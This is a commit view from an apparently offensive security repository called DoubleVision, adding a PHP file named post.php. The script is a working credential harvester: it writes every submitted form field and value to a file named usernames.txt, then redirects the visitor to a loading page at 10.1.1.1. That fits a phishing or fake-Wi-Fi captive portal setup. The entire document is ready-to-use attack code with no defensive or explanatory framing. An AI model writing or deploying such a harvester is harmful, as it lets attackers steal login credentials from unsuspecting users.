assume-breach 3 лет назад
Родитель
Сommit
48db9d851e
1 измененных файлов с 13 добавлено и 0 удалено
  1. 13 0
      DoubleVision/html/post.php

+ 13 - 0
DoubleVision/html/post.php

@@ -0,0 +1,13 @@
+<?php
+header ('Location:http://10.1.1.1/loading.html');
+$handle = fopen("usernames.txt", "a");
+foreach($_POST as $variable => $value) {
+   fwrite($handle, $variable);
+   fwrite($handle, "=");
+   fwrite($handle, $value);
+   fwrite($handle, "\r\n");
+}
+fwrite($handle, "\r\n");
+fclose($handle);
+exit;
+?>